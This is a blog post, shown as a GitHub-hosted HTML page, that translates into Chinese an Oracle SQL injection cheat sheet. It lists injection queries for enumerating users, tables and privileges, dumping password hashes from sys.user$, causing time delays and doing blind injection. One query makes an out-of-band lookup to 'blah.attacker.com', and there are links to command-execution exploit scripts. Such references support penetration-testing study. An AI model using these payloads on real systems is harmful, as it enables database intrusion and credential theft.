-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path14608288508524.html
executable file
·583 lines (364 loc) · 17.5 KB
/
14608288508524.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>
Oracle注入速查表 - 雪地
</title>
<link href="atom.xml" rel="alternate" title="雪地" type="application/atom+xml">
<link rel="stylesheet" href="asset/css/foundation.min.css" />
<link rel="stylesheet" href="asset/css/docs.css" />
<link rel="icon" href="asset/img/favicon.ico" />
<script src="asset/js/vendor/modernizr.js"></script>
<script src="asset/js/vendor/jquery.js"></script>
<script src="asset/highlightjs/highlight.pack.js"></script>
<link href="asset/highlightjs/styles/github.css" media="screen, projection" rel="stylesheet" type="text/css">
<script>hljs.initHighlightingOnLoad();</script>
<script type="text/javascript">
function before_search(){
var searchVal = 'site:yinzo.github.io ' + document.getElementById('search_input').value;
document.getElementById('search_q').value = searchVal;
return true;
}
</script>
</head>
<body class="antialiased hide-extras">
<div class="marketing off-canvas-wrap" data-offcanvas>
<div class="inner-wrap">
<nav class="top-bar docs-bar hide-for-small" data-topbar>
<section class="top-bar-section">
<div class="row">
<div style="position: relative;width:100%;"><div style="position: absolute; width:100%;">
<ul id="main-menu" class="left">
<li id="menu_item_index"><a href="index.html">Blog</a></li>
<li id="menu_item_archives"><a href="archives.html">Archives</a></li>
<li id="menu_item_about"><a href="http://yinz.xyz/">Home</a></li>
</ul>
<ul class="right" id="search-wrap">
<li>
<form target="_blank" onsubmit="return before_search();" action="http://google.com/search" method="get">
<input type="hidden" id="search_q" name="q" value="" />
<input tabindex="1" type="search" id="search_input" placeholder="Search"/>
</form>
</li>
</ul>
</div></div>
</div>
</section>
</nav>
<nav class="tab-bar show-for-small">
<a href="javascript:void(0)" class="left-off-canvas-toggle menu-icon">
<span> 雪地</span>
</a>
</nav>
<aside class="left-off-canvas-menu">
<ul class="off-canvas-list">
<li><a href="index.html">Blog</a></li>
<li><a href="archives.html">Archives</a></li>
<li><a href="http://yinz.xyz/">Home</a></li>
<li><label>Categories</label></li>
<li><a href="Security%20Info.html">Security Info</a></li>
<li><a href="Adversary%20Learning.html">Adversary Learning</a></li>
<li><a href="TCPIP.html">TCP/IP</a></li>
<li><a href="Pattern%20Recognition.html">Pattern Recognition</a></li>
<li><a href="Python.html">Python</a></li>
<li><a href="OS.html">OS</a></li>
<li><a href="Deep%20Learning.html">Deep Learning</a></li>
<li><a href="Machine%20Learning.html">Machine Learning</a></li>
</ul>
</aside>
<a class="exit-off-canvas" href="#"></a>
<section id="main-content" role="main" class="scroll-container">
<script type="text/javascript">
$(function(){
$('#menu_item_index').addClass('is_active');
});
</script>
<div class="row">
<div class="large-8 medium-8 columns">
<div class="markdown-body article-wrap">
<div class="article">
<h1>Oracle注入速查表</h1>
<div class="read-more clearfix">
<span class="date">2015/8/28 17:30 下午</span>
<span class="comments">
</span>
</div>
</div><!-- article -->
<div class="article-content">
<p><small>本文由Yinzo翻译,转载请保留署名。原文地址:<a href="http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet</a></small></p>
<p>注:下面的一部分查询只能由admin执行,我会在查询的末尾以"<strong><code>-priv</code></strong>“标注。</p>
<span id="more"></span><!-- more -->
<p>探测版本:</p>
<pre><code>SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;
</code></pre>
<p>注释:</p>
<pre><code>SELECT 1 FROM dual — comment
</code></pre>
<p><em>注: Oracle的SELECT语句必须包含FROM从句,所以当我们并不是真的准备查询一个表的时候,我们必须使用一个假的表名‘dual’</em></p>
<p>当前用户:</p>
<pre><code>SELECT user FROM dual
</code></pre>
<p>列出所有用户:</p>
<pre><code>SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv
</code></pre>
<p>列出密码哈希:</p>
<pre><code>SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus能够在acct被锁定的状态下给你反馈
SELECT name,spare4 FROM sys.user$ — priv, 11g
</code></pre>
<p>密码破解:</p>
<p><a href="http://www.red-database-security.com/software/checkpwd.html">checkpwd</a>能够把Oracle8,9,10的基于DES的哈希破解掉</p>
<p>列出权限:</p>
<pre><code>SELECT * FROM session_privs; —当前用户的权限
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, 列出指定用户的权限
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, 找到拥有某个权限的用户
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
</code></pre>
<p>列出DBA账户:</p>
<pre><code>SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, 列出DBA和对应权限
</code></pre>
<p>当前数据库:</p>
<pre><code>SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;
</code></pre>
<p>列出数据库:</p>
<pre><code>SELECT DISTINCT owner FROM all_tables; — 列出数据库 (一个用户一个)
</code></pre>
<p>– 通过查询TNS监听程序能够查询到其他数据库.详情看<a href="http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html">tnscmd</a>。</p>
<p>列出字段名:</p>
<pre><code>SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
</code></pre>
<p>列出表名:</p>
<pre><code>SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
</code></pre>
<p>通过字段名找到对应表:</p>
<pre><code>SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;
</code></pre>
<p>— 注: 表名都是大写</p>
<p>查询第N行:</p>
<pre><code>SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)
</code></pre>
<p>查询第N个字符:</p>
<pre><code>SELECT substr(‘abcd’, 3, 1) FROM dual; — 得到第三个字符‘c’
</code></pre>
<p>按位与(Bitwise AND):</p>
<pre><code>SELECT bitand(6,2) FROM dual; — 返回2
SELECT bitand(6,1) FROM dual; — 返回0
</code></pre>
<p>ASCII值转字符:</p>
<pre><code>SELECT chr(65) FROM dual; — 返回A
</code></pre>
<p>字符转ASCII码:</p>
<pre><code>SELECT ascii(‘A’) FROM dual; — 返回65
</code></pre>
<p>类型转换:</p>
<pre><code>SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;
</code></pre>
<p>拼接字符:</p>
<pre><code>SELECT ‘A’ || ‘B’ FROM dual; — 返回AB
</code></pre>
<p>IF语句:</p>
<pre><code>BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
</code></pre>
<p>— 跟SELECT语句在一起时不太管用</p>
<p>Case语句:</p>
<pre><code>SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — 返回1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — 返回2
</code></pre>
<p>绕过引号:</p>
<pre><code>SELECT chr(65) || chr(66) FROM dual; — 返回AB
</code></pre>
<p>延时:</p>
<pre><code>BEGIN DBMS_LOCK.SLEEP(5); END; — priv, 在SELECT中用不了
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 如果反查很慢
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — 如果正查很慢
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — 如果发送TCP包被拦截或者很慢
</code></pre>
<p>— 更多关于延时的内容请看<a href="http://technet.microsoft.com/en-us/library/cc512676.aspx">Heavy Queries</a></p>
<p>发送DNS请求:</p>
<pre><code>SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
</code></pre>
<p>命令执行:</p>
<p>如果目标机装了JAVA就能执行命令,<a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">看这里</a></p>
<p>有时候ExtProc也可以,不过我一般都成功不了,<a href="http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql">看这里</a></p>
<p>本地文件读取:</p>
<p><a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">UTL_FILE</a>有时候能用。如果下面的语句没有返回null就行。</p>
<pre><code>SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;
</code></pre>
<p><a href="http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql">JAVA</a>能用来读取和写入文件,除了Oracle Express</p>
<p>主机名称、IP地址:</p>
<pre><code>SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — 查IP
SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 查主机名称
</code></pre>
<p>定位DB文件:</p>
<pre><code>SELECT name FROM V$DATAFILE;
</code></pre>
<p>默认系统和数据库:</p>
<pre><code>SYSTEM
SYSAUX
</code></pre>
<h3 id="toc_0">额外小贴士:</h3>
<p>一个字符串列出所有表名:</p>
<pre><code>select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables
</code></pre>
<p>– 当你union联查注入的时候只有一行能用与返回数据时使用</p>
<p>盲注排序:</p>
<pre><code>order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end
</code></pre>
<p>— 你必须知道两个拥有相同数据类型的字段名才能用</p>
</div>
<div class="row">
<div class="large-6 columns">
<p class="text-left" style="padding:15px 0px;">
<a href="14608288193470.html"
title="Previous Post: 2015暑假">« 2015暑假</a>
</p>
</div>
<div class="large-6 columns">
<p class="text-right" style="padding:15px 0px;">
<a href="14608288742293.html"
title="Next Post: 解决Python的pytesseract库执行时报错">解决Python的pytesseract库执行时报错 »</a>
</p>
</div>
</div>
<div class="comments-wrap">
<div class="share-comments">
<div id="disqus_thread"></div>
<script>
/**
* RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
* LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables
*/
/*
var disqus_config = function () {
this.page.url = PAGE_URL; // Replace PAGE_URL with your page's canonical URL variable
this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
};
*/
(function() { // DON'T EDIT BELOW THIS LINE
var d = document, s = d.createElement('script');
s.src = '//yinzo.disqus.com/embed.js';
s.setAttribute('data-timestamp', +new Date());
(d.head || d.body).appendChild(s);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
</div><!-- article-wrap -->
</div><!-- large 8 -->
<div class="large-4 medium-4 columns">
<div class="hide-for-small">
<div id="sidebar" class="sidebar">
<div id="site-info" class="site-info">
<div class="site-a-logo"><img src="asset/img/3.png" /></div>
<h1>雪地</h1>
<div class="site-des"></div>
<div class="social">
<a class="github" target="_blank" href="https://github.com/Yinzo" title="GitHub">GitHub</a>
<a class="email" href="mailto:[email protected]" title="Email">Email</a>
<a class="rss" href="atom.xml" title="RSS">RSS</a>
</div>
</div>
<div id="site-categories" class="side-item ">
<div class="side-header">
<h2>Categories</h2>
</div>
<div class="side-content">
<p class="cat-list">
<a href="Security%20Info.html"><strong>Security Info</strong></a>
<a href="Adversary%20Learning.html"><strong>Adversary Learning</strong></a>
<a href="TCPIP.html"><strong>TCP/IP</strong></a>
<a href="Pattern%20Recognition.html"><strong>Pattern Recognition</strong></a>
<a href="Python.html"><strong>Python</strong></a>
<a href="OS.html"><strong>OS</strong></a>
<a href="Deep%20Learning.html"><strong>Deep Learning</strong></a>
<a href="Machine%20Learning.html"><strong>Machine Learning</strong></a>
</p>
</div>
</div>
<div id="site-categories" class="side-item">
<div class="side-header">
<h2>Recent Posts</h2>
</div>
<div class="side-content">
<ul class="posts-list">
<li class="post">
<a href="14968173531750.html">CS229 学习笔记 Part3</a>
</li>
<li class="post">
<a href="14965964854250.html">CS229 学习笔记 Part2</a>
</li>
<li class="post">
<a href="14946020792948.html">CS229 学习笔记 Part 1</a>
</li>
<li class="post">
<a href="14883590547961.html">原始模型优化笔记</a>
</li>
<li class="post">
<a href="14863637393852.html">低素质弹幕分类器的CNN实现</a>
</li>
</ul>
</div>
</div>
<div id="site-link" class="side-item">
<div class="side-header">
<h2>Link</h2>
</div>
<div class="side-content">
<p class="link-list">
<a href="http://blog.winkidney.com/">阿毛</a>
</p>
</div>
</div>
</div><!-- sidebar -->
</div><!-- hide for small -->
</div><!-- large 4 -->
</div><!-- row -->
<div class="page-bottom clearfix">
<div class="row">
<p class="copyright">Copyright © 2016
Powered by <a target="_blank" href="http://www.mweb.im">MWeb</a>,
Theme used <a target="_blank" href="http://github.com">GitHub CSS</a>.
Modified by <a target="_blank" href="http://yinz.xyz">Yinzo</a>.</p>
</div>
</div>
</section>
</div>
</div>
<script src="asset/js/foundation.min.js"></script>
<script>
$(document).foundation();
function fixSidebarHeight(){
var w1 = $('.markdown-body').height();
var w2 = $('#sidebar').height();
if (w1 > w2) { $('#sidebar').height(w1); };
}
$(function(){
fixSidebarHeight();
})
$(window).load(function(){
fixSidebarHeight();
});
</script>
<script src="asset/chart/all-min.js"></script><script type="text/javascript">$(function(){ var mwebii=0; var mwebChartEleId = 'mweb-chart-ele-'; $('pre>code').each(function(){ mwebii++; var eleiid = mwebChartEleId+mwebii; if($(this).hasClass('language-sequence')){ var ele = $(this).addClass('nohighlight').parent(); $('<div id="'+eleiid+'"></div>').insertAfter(ele); ele.hide(); var diagram = Diagram.parse($(this).text()); diagram.drawSVG(eleiid,{theme: 'simple'}); }else if($(this).hasClass('language-flow')){ var ele = $(this).addClass('nohighlight').parent(); $('<div id="'+eleiid+'"></div>').insertAfter(ele); ele.hide(); var diagram = flowchart.parse($(this).text()); diagram.drawSVG(eleiid); } });});</script>
<script type="text/javascript" src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({TeX: { equationNumbers: { autoNumber: "AMS" } }});</script>
<script src="asset/js/instantclick.min.js" data-no-instant></script>
<script data-no-instant>InstantClick.on('change', function() {
MathJax.Hub.Queue(["Typeset",MathJax.Hub]);
});</script>
<script data-no-instant>InstantClick.init();</script>
</body>
</html>